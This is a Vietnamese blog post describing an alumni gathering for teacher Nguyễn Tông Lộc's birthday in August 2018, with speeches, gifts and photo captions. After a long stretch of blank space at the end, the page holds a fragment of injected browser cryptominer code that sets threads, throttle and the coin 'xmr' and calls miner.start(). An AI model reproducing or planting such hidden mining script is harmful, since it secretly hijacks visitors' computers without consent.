Sinh nhật Thầy Nguyễn Tông Lộc - Trần Thị Tuyết -


Sinh nhật Thầy Nguyễn Tông Lộc

      Ngày 6/8/2018 Nhân dịp sinh nhật của Thầy Nguyễn Tông Lộc, Các anh chị Cựu Học Viên Khóa 3 NLS Định Tường - Bến Tre đã đứng ra đăng cai tổ chức buổi họp mặt quý thầy cô và các Bạn CHV NLS ĐT-BT nhằm mục đích tạo thêm sự gắn kết giữa các khóa lại với nhau, và đây cũng là dịp để các bạn có thể bày tỏ hết được nỗi lòng của mình với thầy cô , với các bạn, những vấn đề thắc mắc còn vướng bận tháo gỡ hết ra. Và cuối cùng tất cả cùng nhau nắm tay lại để cùng nhau đưa hoạt động của tập thề NLS Định Tường - Bến Tre cùng nhau đi lên.
      Sau lời tuyên bố lý do của anh Võ Đăng Khoa- Khóa 3, Thầy Cựu Hiệu Trưởng Nguyễn Tấn Phúc đã phát biểu: " Thầy rất vui khi thấy tập thể các em biết đoàn kết với nhau. Mặc dù có nhiều bất đồng ý kiến, nhưng chúng ta biết ngồi lại để mổ xẻ vấn đề và thống nhất lại để cùng nhau tiến lên. Các trường khác đều có lời khen ngợi trường chúng ta hoạt động rất tốt, các em hãy cố gắng phát huy hơn nữa những gì mình đã làm được. Tập thể chúng ta rất may mắn có được quý thầy có tâm mà có lực nữa, nên quý thầy đã hỗ trợ các em rất nhiều. Như vậy các em hãy cố gắng phát huy nhiều hơn nữa để đưa hoạt động của trường đi lên."
Anh Nguyễn Văn Mới tặng thầy Nguyễn Tấn Phúc một bức ảnh ngày  Lễ tốt nghiệp của khóa 2 Quốc Gia Nông Lâm Mục BLAO.

Ban Liên Lạc khóa 3 tặng quà lưu niệm cho thầy Nguyễn Tấn Phúc và Thầy Nguyễn Tông Lộc. Hai bức ảnh vẽ Truyền thần của nghệ nhân Hoa Lợi - Họa sĩ 81 tuổi còn lại duy nhất tại Sài Gòn -

Cựu học viên NLS Bến Tre tặng Thầy Nguyễn Tông Lộc bức ảnh lưu niệm:

Đại diện khóa 3, anh Nguyễn Văn Mới cũng gửi tặng quý thầy cô bức ảnh lưu niệm:

Thầy Nguyễn Ngọc Chơn, Thầy Nguyễn Văn Nâu, thầy Nguyễn Văn Cao, Thầy Nguyễn Văn Lộc, Thầy Trần Văn Lộ và thầy Trần Hữu Trí và thầy Nguyễn Văn Vinh.


Và ban tổ chức cũng tặng cho các thành viên tích cực trong công tác của trường..

Thầy Nguyễn Tông Lộc và cô Sương cùng nhau cắt bánh sinh nhật

Và đây mới là phần quan trọng: Chúc mừng Sinh Nhật Thầy Nguyễn Tông Lộc, tất cả cùng hát vang bài hát Happy Birthday một cách vui vẻ và hào hứng.

Anh Phùng K3, anh Hùng , anh Chánh K5, Thầy Nguyễn Tấn Phúc, Thầy Nguyễn Ngọc Chơn.
Thầy Trần Văn Lộ, thầy Trần Hữu Trí và các anh NLS Bến Tre
Các anh chị khóa 2 , khóa 5 và cô Phúc , cô Sương

Anh Phùng khóa 3 và các anh em khóa 6 và Bến Tre

    

 

 

    

 
     

                               

 
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();